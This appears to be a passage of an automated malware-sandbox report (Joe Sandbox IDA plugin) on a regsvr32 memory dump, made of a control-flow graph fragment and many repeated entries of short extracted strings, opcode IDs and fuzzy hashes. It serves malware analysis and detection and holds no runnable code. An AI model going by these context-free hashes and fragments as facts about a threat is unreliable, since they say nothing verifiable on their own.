8130 7ffcf44e3c84-7ffcf44e3c9f 8126->8130 8135 7ffcf44e3e7a-7ffcf44e3e9f call 7ffcf44dc538 8127->8135 8133 7ffcf44e3cab-7ffcf44e3caf 8130->8133 8134 7ffcf44e3ca1-7ffcf44e3ca6 8130->8134 8133->8135 8136 7ffcf44e3cb5-7ffcf44e3cc1 8133->8136 8134->8084 8146 7ffcf44e3ea6-7ffcf44e3ecb call 7ffcf44dc538 8135->8146 8136->8040 8139 7ffcf44e3cc7-7ffcf44e3ce2 8136->8139 8141 7ffcf44e3ce4-7ffcf44e3ce9 8139->8141 8142 7ffcf44e3cee-7ffcf44e3cf2 8139->8142 8141->8084 8145 7ffcf44e3cf8-7ffcf44e3d04 8142->8145 8142->8146 8145->8040 8149 7ffcf44e3d0a-7ffcf44e3d25 8145->8149 8154 7ffcf44e3ed2-7ffcf44e3ef7 call 7ffcf44dc538 8146->8154 8150 7ffcf44e3d27-7ffcf44e3d2c 8149->8150 8151 7ffcf44e3d2e-7ffcf44e3d32 8149->8151 8150->8084 8153 7ffcf44e3d38-7ffcf44e3d3f 8151->8153 8151->8154 8153->8040 8156 7ffcf44e3d45-7ffcf44e3d60 8153->8156 8160 7ffcf44e3efe-7ffcf44e3f48 call 7ffcf44dc510 8154->8160 8159 7ffcf44e3d66 8156->8159 8156->8160 8159->8084 8160->8040
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: uK_^
                                                                              • API String ID: 0-2962936059
                                                                              • Opcode ID: 0786b39455a344931cad407269396901f3e7245999cc3659d8fe16ce91b50d5c
                                                                              • Instruction ID: 8cc18d5b711200c8796a49bead6f56f6ae5144589d981cc4f2d2b94bfd8e29d1
                                                                              • Opcode Fuzzy Hash: 0786b39455a344931cad407269396901f3e7245999cc3659d8fe16ce91b50d5c
                                                                              • Instruction Fuzzy Hash: 19423530B18A5E4FEB99E72884B46F5BBD1FF94304B4445BAD05ED71CADE18E841C7A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 3Z
                                                                              • API String ID: 0-2615429446
                                                                              • Opcode ID: 3612e9abeab1d63bf4a2817db1ac200d5a54a75844594f1c7c204901bc13e2ce
                                                                              • Instruction ID: 87ab2034af828ed5672e66e4a5878535d96b67469b05a3ba0a9f8a41de2ef251
                                                                              • Opcode Fuzzy Hash: 3612e9abeab1d63bf4a2817db1ac200d5a54a75844594f1c7c204901bc13e2ce
                                                                              • Instruction Fuzzy Hash: 3112F961F1C96E4FEB84FB2884A56B8BBD1EF55714F44007AE05DE32CBDD18A841CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: c86493537dffbb977cf8ad0a1c817fdd6edd1edaca62f3a577b4e369a4b9b15b
                                                                              • Instruction ID: b91f7042c70474ba7caf23161ab5a3765754b44606d92c51273524e4f9118471
                                                                              • Opcode Fuzzy Hash: c86493537dffbb977cf8ad0a1c817fdd6edd1edaca62f3a577b4e369a4b9b15b
                                                                              • Instruction Fuzzy Hash: 5722E752F2C96A5AE798F72884B5774FAD2EF84604F4801B9D01DE32CBCD18EC41D76A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: f463da9f6a09508d93f71a145a4279745b062ed64458557eed5402f0430bc733
                                                                              • Instruction ID: d73fda4bcc58c903908a464701ec51b2bb388ffc029edb70db7fb0fd6ecf7c76
                                                                              • Opcode Fuzzy Hash: f463da9f6a09508d93f71a145a4279745b062ed64458557eed5402f0430bc733
                                                                              • Instruction Fuzzy Hash: 4522E852F2C96A5AE798F72884B5774FAD2EF84704F0801B9D01DE32DBCD18E841D66A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 5a9cf9819431370b67c47039263e7b06b2f5d7aa2f637a4c7b9e061cc9246fe8
                                                                              • Instruction ID: 7015fd9434fbda5166bfed428504b429b1906258d5548af4863cdc42170d9068
                                                                              • Opcode Fuzzy Hash: 5a9cf9819431370b67c47039263e7b06b2f5d7aa2f637a4c7b9e061cc9246fe8
                                                                              • Instruction Fuzzy Hash: 7612F752F2C96A5BE798F72884B5774EAD2EF84604F0801B9D01DE32CBCD18EC41D76A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: d
                                                                              • API String ID: 0-2564639436
                                                                              • Opcode ID: a88d7215c8664c9c96370fc77f8f7f217bdbb189b76d5d5304331ef5fb58d217
                                                                              • Instruction ID: f3f31ee89555e37c7fa695b89ae9c0c716c567ce3deb69b5bffd662cbe4235d5
                                                                              • Opcode Fuzzy Hash: a88d7215c8664c9c96370fc77f8f7f217bdbb189b76d5d5304331ef5fb58d217
                                                                              • Instruction Fuzzy Hash: E6E11330A18A098FEB58DF18C495575B7E1FF98310B1446BDE45ED728ADE34EC42CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: 917ab68f4ad05fc1e73164b46ac60e467b38bd7e3f8b3a4e229948b44a770bca
                                                                              • Instruction ID: 1c2afaf869dd00d88e6b696ec30005e37e8ec1ce1e6c0fd7f0a2b78af9d21966
                                                                              • Opcode Fuzzy Hash: 917ab68f4ad05fc1e73164b46ac60e467b38bd7e3f8b3a4e229948b44a770bca
                                                                              • Instruction Fuzzy Hash: 16F16531A1895D8FDB98EF58C4E1AA8BBE2EF98314F4401A5C41EF72CACD35E841CB54
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: sJ_H
                                                                              • API String ID: 0-1625772097
                                                                              • Opcode ID: 569200a7a32dc4120248d51f8bcf21c5b081175d732fadf1b3eb1af31d5b6ae7
                                                                              • Instruction ID: e01ede6e93e1e3608a925298566bd255650cfa0a3a1c40ef2a244914a02d57ef
                                                                              • Opcode Fuzzy Hash: 569200a7a32dc4120248d51f8bcf21c5b081175d732fadf1b3eb1af31d5b6ae7
                                                                              • Instruction Fuzzy Hash: CFC1EA61B1C9594BEB98FB2884B5678FBD2FF98314B4401B9D01DF32CADD18AC42C7A5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fK_L
                                                                              • API String ID: 0-26171842
                                                                              • Opcode ID: 235d33d69d1b4815352f0f778fe09c7e4fbe58bd27f7d1afdba17c8606061541
                                                                              • Instruction ID: 1d7036883e6365ff4d3ae34c275514c648cc8598c015534ba9e5a5b94ad268d9
                                                                              • Opcode Fuzzy Hash: 235d33d69d1b4815352f0f778fe09c7e4fbe58bd27f7d1afdba17c8606061541
                                                                              • Instruction Fuzzy Hash: 98B14B22A0C9AD4BE7A4E628C8A61B8BFE1EF85320F4401B9D05DE71CBDD1C7841D7B5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: bc8bd4cd560cb911d57f715dc7a7251fae15d538cfafe47a906ad3db239d3387
                                                                              • Instruction ID: 9d3c42dc379269151f46a46d72516460d837e8546633b9c84600f1d984f9661c
                                                                              • Opcode Fuzzy Hash: bc8bd4cd560cb911d57f715dc7a7251fae15d538cfafe47a906ad3db239d3387
                                                                              • Instruction Fuzzy Hash: 9F914F70A189698BEB98EF18C4A5BA8BBE1FF58304F4441B4D05DF72C6DE34E881CB51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ;
                                                                              • API String ID: 0-945197754
                                                                              • Opcode ID: 4989a8709685ead42c46e5e135c4dad894e90ad6875da7c139910280dfe9626d
                                                                              • Instruction ID: 768391d578b8c1190a200c702675e5e623aca0e680ed1bc5e94f72f6f48ae904
                                                                              • Opcode Fuzzy Hash: 4989a8709685ead42c46e5e135c4dad894e90ad6875da7c139910280dfe9626d
                                                                              • Instruction Fuzzy Hash: 61614962A0D5A90BE754FB2CE4F11F97FD1EF95224B0801B7D04DEB1C7DD085846CA60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 3366ef45b6b261a3bd08e168188e2dad32e30d61d729175387f07cf261ca617e
                                                                              • Instruction ID: 89d9c1cdf8cb2b7399a20dd26c0ea69c2224ad4e82f292f45c73266242ba7a12
                                                                              • Opcode Fuzzy Hash: 3366ef45b6b261a3bd08e168188e2dad32e30d61d729175387f07cf261ca617e
                                                                              • Instruction Fuzzy Hash: 12710952F1C96B4AFB99E62C84B1374EAC2EF94614F080179D05EE33CBDD28EC01D669
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: bef6bd85c420cb323107aeaebc009f4e9152ee58645784dfc67ab13e93ead9fa
                                                                              • Instruction ID: 37cb6364310ee6dfbbf1ac1703bda2f0b7daca4bdb567843a3762bc34666b39c
                                                                              • Opcode Fuzzy Hash: bef6bd85c420cb323107aeaebc009f4e9152ee58645784dfc67ab13e93ead9fa
                                                                              • Instruction Fuzzy Hash: 85814D70A189698BEB98EF58C4A5BA8BBE1FF58304F444174D01DF72DADE38E841CB51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 0fc4a1021c51d8cfbe80d7798e369e3031d94deea528e14cab34537ab434cbd5
                                                                              • Instruction ID: c252ae8d4c7df2ed4b743f691de5c45d00e671ccb9c18c06fc53a217efd5f468
                                                                              • Opcode Fuzzy Hash: 0fc4a1021c51d8cfbe80d7798e369e3031d94deea528e14cab34537ab434cbd5
                                                                              • Instruction Fuzzy Hash: 7151F952F1C96B4AEB98E62884B5374EAC2EF94614F080179D45EF33CBDD28FC01D669
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: 619d04094b3ba2411cd17f5501c0f42860ab11e5591b1c288770b2667ee93ea9
                                                                              • Instruction ID: 96886c2c393c2d7d4ec46258f4e669c5390fe492b5f52670edce1d3dee4d7529
                                                                              • Opcode Fuzzy Hash: 619d04094b3ba2411cd17f5501c0f42860ab11e5591b1c288770b2667ee93ea9
                                                                              • Instruction Fuzzy Hash: 0D614031A1895D8FDB98EF54C4E1AA8BBE2EF58304F4441A8D41EF72CACE24E841CB55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: 525830f1e345cd5738841b4d148b52889fcf6a3fb09cca60f5bfe2172387239f
                                                                              • Instruction ID: 341dbcc0bf729cf3ef3c7aea5e2a838ca3e591499c2e32324c729c8c1aef9feb
                                                                              • Opcode Fuzzy Hash: 525830f1e345cd5738841b4d148b52889fcf6a3fb09cca60f5bfe2172387239f
                                                                              • Instruction Fuzzy Hash: 9A312862A1C96A4FF748FB18D4B51B8BBD1FF92215B0801B6D05DF70CBCD289845C676
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: e074a9b927624ccadc4d2671dd2a144ea59b8c883dca1538a0dd7762fea67d18
                                                                              • Instruction ID: 23020474f8b1201248711d525628cfc20bb933199bfc97f75dee95f840e39c43
                                                                              • Opcode Fuzzy Hash: e074a9b927624ccadc4d2671dd2a144ea59b8c883dca1538a0dd7762fea67d18
                                                                              • Instruction Fuzzy Hash: 6A312D70A1896D8FDB98EF14C8A5BA8B7E2EF48304F5401B9D01EF72D5CE24E881CB15
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ;
                                                                              • API String ID: 0-945197754
                                                                              • Opcode ID: 69f88082eaf5475619fd6c5ef77748636deeaf6bb892f51fe0cac352e4b02c98
                                                                              • Instruction ID: bb5bb50b2032a59bf0091b4b4559fa325b2aa5260341958c884b39d245edd6f5
                                                                              • Opcode Fuzzy Hash: 69f88082eaf5475619fd6c5ef77748636deeaf6bb892f51fe0cac352e4b02c98
                                                                              • Instruction Fuzzy Hash: 2DF04921E1CA5A0BFB58FA68A0F15F0FBD1DF94210B0802BAD01DE31CBCD489845CB61
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a69b416692ea18f37d7789d305c3d4d70ab5318d04565773f4212c907592fc5d
                                                                              • Instruction ID: 10bed4e0873a995e338725762efd0b45f00d0307f998b312fc08371d5bfbcb32
                                                                              • Opcode Fuzzy Hash: a69b416692ea18f37d7789d305c3d4d70ab5318d04565773f4212c907592fc5d
                                                                              • Instruction Fuzzy Hash: 1A329431B1CA294FD754FA2CD4A26B9B7E1FF98714B040179D05DE32DADE28E84287A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73ab48d9a9908a367a7190908835ff498377694d593f7b8f2bcc94e01d43ebfd
                                                                              • Instruction ID: ad890e9df40b33342ab94bf27c446594526517fe0558b0c8d25040beb1514b5b
                                                                              • Opcode Fuzzy Hash: 73ab48d9a9908a367a7190908835ff498377694d593f7b8f2bcc94e01d43ebfd
                                                                              • Instruction Fuzzy Hash: BB121C21F1C95E4FE758E628D8A92B9BBD1FF94310F0401BAE45DE31CADD1CA842C7A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5d8e82234abd89a2e882fff301fe9a8c6209105e29a837ef6c8b8b6e54efffdd
                                                                              • Instruction ID: 0c76d1e5a51f1b1d077cbaaead3c51092e04ff4bb6243ba1c8f6227d4406674c
                                                                              • Opcode Fuzzy Hash: 5d8e82234abd89a2e882fff301fe9a8c6209105e29a837ef6c8b8b6e54efffdd
                                                                              • Instruction Fuzzy Hash: 73F1C721B1C92E4FEB88F728C4E5678BBD1EF59344B440179E05EE32CBDD18E84287A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b234927cee6b990ba8f10ac4265acf47dba1ddaff3d34dfbc7857ed9639441f3
                                                                              • Instruction ID: f34fa22b635a4afa35a0659c90a3803867b76daefefc6092729da399bb45924c
                                                                              • Opcode Fuzzy Hash: b234927cee6b990ba8f10ac4265acf47dba1ddaff3d34dfbc7857ed9639441f3
                                                                              • Instruction Fuzzy Hash: E8127270A18A298BDB58EF18C8A56B8FBE1FF58704F0401B9D05DF3295DE34E941CB96
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 45fec199abab14a237b100f2b25c031120b2216a15823bf5aba9dfd8056b3230
                                                                              • Instruction ID: 2aff526f7b0d08226afcca3512499da4ec249daf1f46484db44c8771cbe60799
                                                                              • Opcode Fuzzy Hash: 45fec199abab14a237b100f2b25c031120b2216a15823bf5aba9dfd8056b3230
                                                                              • Instruction Fuzzy Hash: 27029761A1895A8BEB98EB28C4B56B8F6D2FF54304F4401B9D05EF32D7CD28E841C7A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 262902e84c569724d51e2a7eff18aba60715da07c74f74290eda898fb4e8d9fa
                                                                              • Instruction ID: e1c851b903eb54cd3cd162380fe009009a03e6b578ea1652dbd30a8ee528e196
                                                                              • Opcode Fuzzy Hash: 262902e84c569724d51e2a7eff18aba60715da07c74f74290eda898fb4e8d9fa
                                                                              • Instruction Fuzzy Hash: F2E1A461E1C96B8BEB58EF28D8A16B9BBD1FF45714F040179D01DF31C6CE28A801CBA5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 561f964b3643ce8e2ecfb1db7259d50655dea32a1a205568348fed9a7983ad9d
                                                                              • Instruction ID: d2918eda5fd5a5b1f070cdcca0ed74f8fa92de618603cc24440ad996bd8758a3
                                                                              • Opcode Fuzzy Hash: 561f964b3643ce8e2ecfb1db7259d50655dea32a1a205568348fed9a7983ad9d
                                                                              • Instruction Fuzzy Hash: AFF18570E18A698BE758EF18C8A56B8FBE1FF58704F0401B9D05DF3296DE34A841CB95
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b16b00a8f1c92a0b527e27eb59d30d023f00dd828db28fdb1a511ba611aa9113
                                                                              • Instruction ID: 52544836a92107ab6ac0050a880a8ee9aab239ce2d715cd510d765e022d86953
                                                                              • Opcode Fuzzy Hash: b16b00a8f1c92a0b527e27eb59d30d023f00dd828db28fdb1a511ba611aa9113
                                                                              • Instruction Fuzzy Hash: 1FB129A2E1865A4AE741FF2CE8F62F87BE2EF51225F4800B7D088EA197CD1C6485C755
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e656c3cf8aae10d3ccab8215b79571b41823f1a426be7c7ed213301a7c56815
                                                                              • Instruction ID: 2b4e84e922ab69c7ec09bff40cd0d91b9b19c91d1a379ed9bf7205538916a7fc
                                                                              • Opcode Fuzzy Hash: 7e656c3cf8aae10d3ccab8215b79571b41823f1a426be7c7ed213301a7c56815
                                                                              • Instruction Fuzzy Hash: 97B1F561A1C91A4FEB9CEF28C4A66B4BBD2EF95304F440579D05DF31CBDD28A842C6B1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3424b3968f315432b91a62d4dc1a2b8076ac5b33d8d19da0d70b63be8eacd7c2
                                                                              • Instruction ID: 4e0300c5359a67e55b49e8b45c0de2650583341241c3aa81623fb6d6f64a5cfb
                                                                              • Opcode Fuzzy Hash: 3424b3968f315432b91a62d4dc1a2b8076ac5b33d8d19da0d70b63be8eacd7c2
                                                                              • Instruction Fuzzy Hash: D8B18070A1891D8FEB98EB28C495AB9B7E2FF98314F140179D01ED3296DE35F842CB54
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8a3e1edca2e59cc698f6faba5f6b201ab023d6c4b59b10e767f40cb6bc16a383
                                                                              • Instruction ID: 67a980f7cd59d5ba2c2cecdf5624dc46b741cc693b44fb6ed481954d825eaab4
                                                                              • Opcode Fuzzy Hash: 8a3e1edca2e59cc698f6faba5f6b201ab023d6c4b59b10e767f40cb6bc16a383
                                                                              • Instruction Fuzzy Hash: 6B812C72F1CD590FE78CEA2C98A61B4BBD1EF55310B0401BAD44DE31D7ED19AC4287A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1681bd1e9c979d5cc1e1f6d843202e31de3868380271193a445ed952277b185c
                                                                              • Instruction ID: cfb13b600187df14b43bd661b01c4ab5ce77f17c6aff274854549c02de77a77d
                                                                              • Opcode Fuzzy Hash: 1681bd1e9c979d5cc1e1f6d843202e31de3868380271193a445ed952277b185c
                                                                              • Instruction Fuzzy Hash: 768162317089188FDB98EB1CD459B7877E2FF99311F1401AAE44ED72A6CE24EC42CB55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae9e075e6f52b64644609166c74ecef2f155a0392f4cffadf147cb4375a92341
                                                                              • Instruction ID: f1626e2f7c0a076781400306e4baf525e705fc805eaf1b8d78ac20ac17ab02aa
                                                                              • Opcode Fuzzy Hash: ae9e075e6f52b64644609166c74ecef2f155a0392f4cffadf147cb4375a92341
                                                                              • Instruction Fuzzy Hash: D5711961E1C91A4BE79CFF2884A66B5B7C1EF45314F44017DE45FF31CADD18E8028AA6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
